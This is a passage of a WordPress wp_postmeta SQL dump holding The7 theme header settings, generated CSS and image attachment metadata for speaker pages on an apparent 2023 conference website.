(28711,3874,'_dt_sidebar_hide_on_mobile','0'),
(28712,3874,'_dt_footer_show','1'),
(28713,3874,'_dt_footer_widgetarea_id','sidebar_2'),
(28714,3874,'_dt_footer_hide_on_mobile','0'),
(28715,3874,'_dt_header_title','fancy'),
(28716,3874,'_dt_header_background','normal'),
(28717,3874,'_dt_header_background_below_slideshow','disabled'),
(28718,3874,'_dt_header_transparent_bg_color_scheme','light'),
(28719,3874,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28720,3874,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28721,3874,'_dt_header_transparent_bg_color','#000000'),
(28722,3874,'_dt_header_transparent_bg_opacity','50'),
(28723,3874,'_dt_header_disabled_background','normal'),
(28724,3874,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28725,3874,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28726,3874,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28727,3874,'_dt_header_disabled_transparent_bg_color','#000000'),
(28728,3874,'_dt_header_disabled_transparent_bg_opacity','50'),
(28729,3874,'_dt_page_overrides_top_margin',''),
(28730,3874,'_dt_page_overrides_right_margin',''),
(28731,3874,'_dt_page_overrides_bottom_margin',''),
(28732,3874,'_dt_page_overrides_left_margin',''),
(28733,3874,'_dt_mobile_page_padding_top',''),
(28734,3874,'_dt_mobile_page_padding_right',''),
(28735,3874,'_dt_mobile_page_padding_bottom',''),
(28736,3874,'_dt_mobile_page_padding_left',''),
(28737,3874,'_dt_fancy_header_layout_heading',''),
(28738,3874,'_dt_fancy_header_title_aligment','center'),
(28739,3874,'_dt_fancy_header_height','300'),
(28740,3874,'_dt_fancy_header_padding-top','0px'),
(28741,3874,'_dt_fancy_header_padding-bottom','0px'),
(28742,3874,'_dt_fancy_header_breadcrumbs_heading',''),
(28743,3874,'_dt_fancy_header_breadcrumbs','disabled'),
(28744,3874,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28745,3874,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28746,3874,'_dt_fancy_header_title_heading',''),
(28747,3874,'_dt_fancy_header_title_mode','custom'),
(28748,3874,'_dt_fancy_header_title','Dr. Adel Moussa'),
(28749,3874,'_dt_fancy_header_title_font_size','30'),
(28750,3874,'_dt_fancy_header_title_line_height','36'),
(28751,3874,'_dt_fancy_header_text_transform','none'),
(28752,3874,'_dt_fancy_header_title_color_mode','color'),
(28753,3874,'_dt_fancy_header_title_color','#ffffff'),
(28754,3874,'_dt_fancy_header_subtitle_heading',''),
(28755,3874,'_dt_fancy_header_subtitle','University of Calgary, Canada'),
(28756,3874,'_dt_fancy_header_subtitle_font_size','18'),
(28757,3874,'_dt_fancy_header_subtitle_line_height','26'),
(28758,3874,'_dt_fancy_header_subtitle_text_transform','none'),
(28759,3874,'_dt_fancy_header_subtitle_color_mode','color'),
(28760,3874,'_dt_fancy_header_subtitle_color','#ffffff'),
(28761,3874,'_dt_fancy_header_bg_heading',''),
(28762,3874,'_dt_fancy_header_bg_color','#222222'),
(28763,3874,'_dt_fancy_header_bg_image_origin','custom'),
(28764,3874,'_dt_fancy_header_bg_image','a:0:{}'),
(28765,3874,'_dt_fancy_header_bg_repeat','no-repeat'),
(28766,3874,'_dt_fancy_header_bg_position_x','center'),
(28767,3874,'_dt_fancy_header_bg_position_y','center'),
(28768,3874,'_dt_fancy_header_bg_fullscreen','1'),
(28769,3874,'_dt_fancy_header_bg_overlay','0'),
(28770,3874,'_dt_fancy_header_overlay_color','#000'),
(28771,3874,'_dt_fancy_header_bg_overlay_opacity','50'),
(28772,3874,'_dt_fancy_header_scroll_effect','default'),
(28773,3874,'_dt_fancy_header_bg_parallax','0.5'),
(28774,3874,'_dt_fancy_header_responsiveness_heading',''),
(28775,3874,'_dt_fancy_header_responsiveness','disabled'),
(28776,3874,'_dt_fancy_header_responsiveness_switch','778px'),
(28777,3874,'_dt_fancy_header_responsive_height','70'),
(28778,3874,'_dt_fancy_header_responsive_font_size','30'),
(28779,3874,'_dt_fancy_header_responsive_title_line_height','38'),
(28780,3874,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28781,3874,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28782,3874,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28783,3874,'_dt_teammate_options_go_to_single','1'),
(28784,3874,'_dt_teammate_options_position',''),
(28785,3874,'_dt_teammate_options_website',''),
(28786,3874,'_dt_teammate_options_mail',''),
(28787,3874,'_dt_teammate_options_facebook',''),
(28788,3874,'_dt_teammate_options_twitter',''),
(28789,3874,'_dt_teammate_options_dribbble',''),
(28790,3874,'_dt_teammate_options_you-tube',''),
(28791,3874,'_dt_teammate_options_rss',''),
(28792,3874,'_dt_teammate_options_delicious',''),
(28793,3874,'_dt_teammate_options_flickr',''),
(28794,3874,'_dt_teammate_options_lastfm',''),
(28795,3874,'_dt_teammate_options_linkedin',''),
(28796,3874,'_dt_teammate_options_vimeo',''),
(28797,3874,'_dt_teammate_options_tumbler',''),
(28798,3874,'_dt_teammate_options_pinterest',''),
(28799,3874,'_dt_teammate_options_devian',''),
(28800,3874,'_dt_teammate_options_skype',''),
(28801,3874,'_dt_teammate_options_github',''),
(28802,3874,'_dt_teammate_options_instagram',''),
(28803,3874,'_dt_teammate_options_stumbleupon',''),
(28804,3874,'_dt_teammate_options_behance',''),
(28805,3874,'_dt_teammate_options_px-500',''),
(28806,3874,'_dt_teammate_options_tripedvisor',''),
(28807,3874,'_dt_teammate_options_vk',''),
(28808,3874,'_dt_teammate_options_foursquare',''),
(28809,3874,'_dt_teammate_options_xing',''),
(28810,3874,'_dt_teammate_options_weibo',''),
(28811,3874,'_dt_teammate_options_odnoklassniki',''),
(28812,3874,'_dt_teammate_options_research-gate',''),
(28813,3874,'_dt_teammate_options_yelp',''),
(28814,3874,'_dt_teammate_options_blogger',''),
(28815,3874,'_dt_teammate_options_soundcloud',''),
(28816,3874,'_dt_teammate_options_viber',''),
(28817,3874,'_dt_teammate_options_whatsapp',''),
(28818,3874,'_dt_teammate_options_reddit',''),
(28819,3874,'_dt_teammate_options_snapchat',''),
(28820,3874,'_dt_teammate_options_telegram',''),
(28821,3874,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28822,3876,'_edit_lock','1675728930:1'),
(28823,3877,'_wp_attached_file','2023/02/Dr-Bassem-Shita-Photo-scaled.jpg'),
(28824,3877,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2311;s:6:\"height\";i:2560;s:4:\"file\";s:40:\"2023/02/Dr-Bassem-Shita-Photo-scaled.jpg\";s:8:\"filesize\";i:493120;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Dr-Bassem-Shita-Photo-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9963;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"Dr-Bassem-Shita-Photo-924x1024.jpg\";s:5:\"width\";i:924;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84202;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Dr-Bassem-Shita-Photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4266;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"Dr-Bassem-Shita-Photo-768x851.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:851;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56875;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"Dr-Bassem-Shita-Photo-1387x1536.jpg\";s:5:\"width\";i:1387;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197337;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"Dr-Bassem-Shita-Photo-1849x2048.jpg\";s:5:\"width\";i:1849;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:337393;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:33:\"Dr-Bassem-Shita-Photo-500x554.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25542;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:33:\"Dr-Bassem-Shita-Photo-800x886.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:886;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61751;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:35:\"Dr-Bassem-Shita-Photo-1280x1418.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1418;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169124;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:35:\"Dr-Bassem-Shita-Photo-1920x2127.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:2127;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:360607;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1655362694\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:25:\"Dr-Bassem-Shita-Photo.jpg\";}'),
(28825,3876,'_thumbnail_id','3877'),
(28826,3876,'_edit_last','1'),
(28827,3876,'_dt_sidebar_position','disabled'),
(28828,3876,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28829,3876,'_dt_sidebar_hide_on_mobile','0'),
(28830,3876,'_dt_footer_show','1'),
(28831,3876,'_dt_footer_widgetarea_id','sidebar_2'),
(28832,3876,'_dt_footer_hide_on_mobile','0'),
(28833,3876,'_dt_header_title','fancy'),
(28834,3876,'_dt_header_background','normal'),
(28835,3876,'_dt_header_background_below_slideshow','disabled'),
(28836,3876,'_dt_header_transparent_bg_color_scheme','light'),
(28837,3876,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28838,3876,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28839,3876,'_dt_header_transparent_bg_color','#000000'),
(28840,3876,'_dt_header_transparent_bg_opacity','50'),
(28841,3876,'_dt_header_disabled_background','normal'),
(28842,3876,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28843,3876,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28844,3876,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28845,3876,'_dt_header_disabled_transparent_bg_color','#000000'),
(28846,3876,'_dt_header_disabled_transparent_bg_opacity','50'),
(28847,3876,'_dt_page_overrides_top_margin',''),
(28848,3876,'_dt_page_overrides_right_margin',''),
(28849,3876,'_dt_page_overrides_bottom_margin',''),
(28850,3876,'_dt_page_overrides_left_margin',''),
(28851,3876,'_dt_mobile_page_padding_top',''),
(28852,3876,'_dt_mobile_page_padding_right',''),
(28853,3876,'_dt_mobile_page_padding_bottom',''),
(28854,3876,'_dt_mobile_page_padding_left',''),
(28855,3876,'_dt_fancy_header_layout_heading',''),
(28856,3876,'_dt_fancy_header_title_aligment','center'),
(28857,3876,'_dt_fancy_header_height','300'),
(28858,3876,'_dt_fancy_header_padding-top','0px'),
(28859,3876,'_dt_fancy_header_padding-bottom','0px'),
(28860,3876,'_dt_fancy_header_breadcrumbs_heading',''),
(28861,3876,'_dt_fancy_header_breadcrumbs','disabled'),
(28862,3876,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28863,3876,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28864,3876,'_dt_fancy_header_title_heading',''),
(28865,3876,'_dt_fancy_header_title_mode','custom'),
(28866,3876,'_dt_fancy_header_title',''),
(28867,3876,'_dt_fancy_header_title_font_size','30'),
(28868,3876,'_dt_fancy_header_title_line_height','36'),
(28869,3876,'_dt_fancy_header_text_transform','none'),
(28870,3876,'_dt_fancy_header_title_color_mode','color'),
(28871,3876,'_dt_fancy_header_title_color','#ffffff'),
(28872,3876,'_dt_fancy_header_subtitle_heading',''),
(28873,3876,'_dt_fancy_header_subtitle',''),
(28874,3876,'_dt_fancy_header_subtitle_font_size','18'),
(28875,3876,'_dt_fancy_header_subtitle_line_height','26'),
(28876,3876,'_dt_fancy_header_subtitle_text_transform','none'),
(28877,3876,'_dt_fancy_header_subtitle_color_mode','color'),
(28878,3876,'_dt_fancy_header_subtitle_color','#ffffff'),
(28879,3876,'_dt_fancy_header_bg_heading',''),
(28880,3876,'_dt_fancy_header_bg_color','#222222'),
(28881,3876,'_dt_fancy_header_bg_image_origin','custom'),
(28882,3876,'_dt_fancy_header_bg_image','a:0:{}'),
(28883,3876,'_dt_fancy_header_bg_repeat','no-repeat'),
(28884,3876,'_dt_fancy_header_bg_position_x','center'),
(28885,3876,'_dt_fancy_header_bg_position_y','center'),
(28886,3876,'_dt_fancy_header_bg_fullscreen','1'),
(28887,3876,'_dt_fancy_header_bg_overlay','0'),
(28888,3876,'_dt_fancy_header_overlay_color','#000'),
(28889,3876,'_dt_fancy_header_bg_overlay_opacity','50'),
(28890,3876,'_dt_fancy_header_scroll_effect','default'),
(28891,3876,'_dt_fancy_header_bg_parallax','0.5'),
(28892,3876,'_dt_fancy_header_responsiveness_heading',''),
(28893,3876,'_dt_fancy_header_responsiveness','disabled'),
(28894,3876,'_dt_fancy_header_responsiveness_switch','778px'),
(28895,3876,'_dt_fancy_header_responsive_height','70'),
(28896,3876,'_dt_fancy_header_responsive_font_size','30'),
(28897,3876,'_dt_fancy_header_responsive_title_line_height','38'),
(28898,3876,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28899,3876,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28900,3876,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28901,3876,'_dt_teammate_options_go_to_single','1'),
(28902,3876,'_dt_teammate_options_position',''),
(28903,3876,'_dt_teammate_options_website',''),
(28904,3876,'_dt_teammate_options_mail',''),
(28905,3876,'_dt_teammate_options_facebook',''),
(28906,3876,'_dt_teammate_options_twitter',''),
(28907,3876,'_dt_teammate_options_dribbble',''),
(28908,3876,'_dt_teammate_options_you-tube',''),
(28909,3876,'_dt_teammate_options_rss',''),
(28910,3876,'_dt_teammate_options_delicious',''),
(28911,3876,'_dt_teammate_options_flickr',''),
(28912,3876,'_dt_teammate_options_lastfm',''),
(28913,3876,'_dt_teammate_options_linkedin',''),
(28914,3876,'_dt_teammate_options_vimeo',''),
(28915,3876,'_dt_teammate_options_tumbler',''),
(28916,3876,'_dt_teammate_options_pinterest',''),
(28917,3876,'_dt_teammate_options_devian',''),
(28918,3876,'_dt_teammate_options_skype',''),
(28919,3876,'_dt_teammate_options_github',''),
(28920,3876,'_dt_teammate_options_instagram',''),
(28921,3876,'_dt_teammate_options_stumbleupon',''),
(28922,3876,'_dt_teammate_options_behance',''),
(28923,3876,'_dt_teammate_options_px-500',''),
(28924,3876,'_dt_teammate_options_tripedvisor',''),
(28925,3876,'_dt_teammate_options_vk',''),
(28926,3876,'_dt_teammate_options_foursquare',''),
(28927,3876,'_dt_teammate_options_xing',''),
(28928,3876,'_dt_teammate_options_weibo',''),
(28929,3876,'_dt_teammate_options_odnoklassniki',''),
(28930,3876,'_dt_teammate_options_research-gate',''),
(28931,3876,'_dt_teammate_options_yelp',''),
(28932,3876,'_dt_teammate_options_blogger',''),
(28933,3876,'_dt_teammate_options_soundcloud',''),
(28934,3876,'_dt_teammate_options_viber',''),
(28935,3876,'_dt_teammate_options_whatsapp',''),
(28936,3876,'_dt_teammate_options_reddit',''),
(28937,3876,'_dt_teammate_options_snapchat',''),
(28938,3876,'_dt_teammate_options_telegram',''),
(28939,3876,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28940,2790,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:7:\"3-5.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"3-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4911;}}'),
(28942,3897,'_edit_lock','1677712912:1'),
(28943,3898,'_wp_attached_file','2023/03/28m1.jpg'),
(28944,3898,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:643;s:6:\"height\";i:330;s:4:\"file\";s:16:\"2023/03/28m1.jpg\";s:8:\"filesize\";i:70206;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"28m1-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10325;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"28m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5613;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"28m1-500x257.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23894;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28945,3897,'_thumbnail_id','3898'),
(28946,3897,'_edit_last','1'),
(28947,3897,'_wpb_vc_js_status','true'),
(28948,3897,'_dt_sidebar_position','disabled'),
(28949,3897,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28950,3897,'_dt_sidebar_hide_on_mobile','0'),
(28951,3897,'_dt_footer_show','0'),
(28952,3897,'_dt_footer_widgetarea_id','sidebar_2'),
(28953,3897,'_dt_footer_hide_on_mobile','0'),
(28954,3897,'_dt_header_title','fancy'),
(28955,3897,'_dt_header_background','normal'),
(28956,3897,'_dt_header_background_below_slideshow','disabled'),
(28957,3897,'_dt_header_transparent_bg_color_scheme','light'),
(28958,3897,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28959,3897,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28960,3897,'_dt_header_transparent_bg_color','#000000'),
(28961,3897,'_dt_header_transparent_bg_opacity','50'),
(28962,3897,'_dt_header_disabled_background','normal'),
(28963,3897,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28964,3897,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28965,3897,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28966,3897,'_dt_header_disabled_transparent_bg_color','#000000'),
(28967,3897,'_dt_header_disabled_transparent_bg_opacity','50'),
(28968,3897,'_dt_page_overrides_top_margin',''),
(28969,3897,'_dt_page_overrides_right_margin',''),
(28970,3897,'_dt_page_overrides_bottom_margin',''),
(28971,3897,'_dt_page_overrides_left_margin',''),
(28972,3897,'_dt_mobile_page_padding_top',''),
(28973,3897,'_dt_mobile_page_padding_right',''),
(28974,3897,'_dt_mobile_page_padding_bottom',''),
(28975,3897,'_dt_mobile_page_padding_left',''),
(28976,3897,'_dt_fancy_header_layout_heading',''),
(28977,3897,'_dt_fancy_header_title_aligment','center'),
(28978,3897,'_dt_fancy_header_height','300'),
(28979,3897,'_dt_fancy_header_padding-top','0px'),
(28980,3897,'_dt_fancy_header_padding-bottom','0px'),
(28981,3897,'_dt_fancy_header_breadcrumbs_heading',''),
(28982,3897,'_dt_fancy_header_breadcrumbs','disabled'),
(28983,3897,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28984,3897,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28985,3897,'_dt_fancy_header_title_heading',''),
(28986,3897,'_dt_fancy_header_title_mode','custom'),
(28987,3897,'_dt_fancy_header_title',''),
(28988,3897,'_dt_fancy_header_title_font_size','30'),
(28989,3897,'_dt_fancy_header_title_line_height','36'),
(28990,3897,'_dt_fancy_header_text_transform','none'),
(28991,3897,'_dt_fancy_header_title_color_mode','color'),
(28992,3897,'_dt_fancy_header_title_color','#ffffff'),
(28993,3897,'_dt_fancy_header_subtitle_heading',''),
(28994,3897,'_dt_fancy_header_subtitle',''),
(28995,3897,'_dt_fancy_header_subtitle_font_size','18'),
(28996,3897,'_dt_fancy_header_subtitle_line_height','26'),
(28997,3897,'_dt_fancy_header_subtitle_text_transform','none'),
(28998,3897,'_dt_fancy_header_subtitle_color_mode','color'),
(28999,3897,'_dt_fancy_header_subtitle_color','#ffffff'),
(29000,3897,'_dt_fancy_header_bg_heading',''),
(29001,3897,'_dt_fancy_header_bg_color','#222222'),
(29002,3897,'_dt_fancy_header_bg_image_origin','custom'),
(29003,3897,'_dt_fancy_header_bg_image','a:1:{i:0;i:3923;}'),
(29004,3897,'_dt_fancy_header_bg_repeat','no-repeat'),
(29005,3897,'_dt_fancy_header_bg_position_x','center'),
(29006,3897,'_dt_fancy_header_bg_position_y','center'),
(29007,3897,'_dt_fancy_header_bg_fullscreen','1'),
(29008,3897,'_dt_fancy_header_bg_overlay','0'),
(29009,3897,'_dt_fancy_header_overlay_color','#000'),
(29010,3897,'_dt_fancy_header_bg_overlay_opacity','50'),
(29011,3897,'_dt_fancy_header_scroll_effect','default'),
(29012,3897,'_dt_fancy_header_bg_parallax','0.5'),
(29013,3897,'_dt_fancy_header_responsiveness_heading',''),
(29014,3897,'_dt_fancy_header_responsiveness','disabled'),
(29015,3897,'_dt_fancy_header_responsiveness_switch','778px'),
(29016,3897,'_dt_fancy_header_responsive_height','70'),
(29017,3897,'_dt_fancy_header_responsive_font_size','30'),
(29018,3897,'_dt_fancy_header_responsive_title_line_height','38'),
(29019,3897,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29020,3897,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29021,3897,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29022,3897,'_dt_project_options_back_button',''),
(29023,3897,'_dt_project_options_show_link',''),
(29024,3897,'_dt_project_options_link',''),
(29025,3897,'_dt_project_options_link_target',''),
(29026,3897,'_dt_project_options_link_name',''),
(29027,3897,'_dt_project_options_hide_thumbnail','1'),
(29028,3897,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(29029,3897,'_dt_project_options_related_mode','same'),
(29030,3897,'_dt_project_options_preview','normal'),
(29031,3897,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/03/29m22.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29032,3897,'_wp_page_template','default'),
(29034,3897,'_dt_microsite_primary_menu',''),
(29035,3897,'_dt_microsite_split_left_menu',''),
(29036,3897,'_dt_microsite_split_right_menu',''),
(29037,3897,'_dt_microsite_mobile_menu',''),
(29038,3900,'_wp_attached_file','2023/03/28m2jpg.jpg'),
